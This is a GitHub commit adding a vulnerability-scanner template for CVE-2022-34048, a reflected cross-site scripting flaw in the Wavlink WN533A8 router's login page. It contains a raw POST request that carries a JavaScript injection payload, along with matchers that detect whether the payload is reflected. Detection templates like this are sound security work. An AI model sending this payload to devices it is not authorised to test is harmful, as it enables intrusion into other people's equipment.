Create CVE-2022-34048.yaml

patch-1
Ritik Chaddha 2022-08-06 00:48:35 +05:30 committed by GitHub
parent 7e4eb85b63
commit a81e96d954
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: CVE-2022-34048
info:
name: Wavlink WN533A8 - Cross-Site Scripting (XSS)
author: ritikchaddha
severity: medium
description: |
Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter.
reference:
- https://www.exploit-db.com/exploits/50989
- https://nvd.nist.gov/vuln/detail/CVE-2022-34048
tags: cve,cve2022,wavlink,xss
requests:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=59.148.80.138&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'x");alert(9);x=("?login=0"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200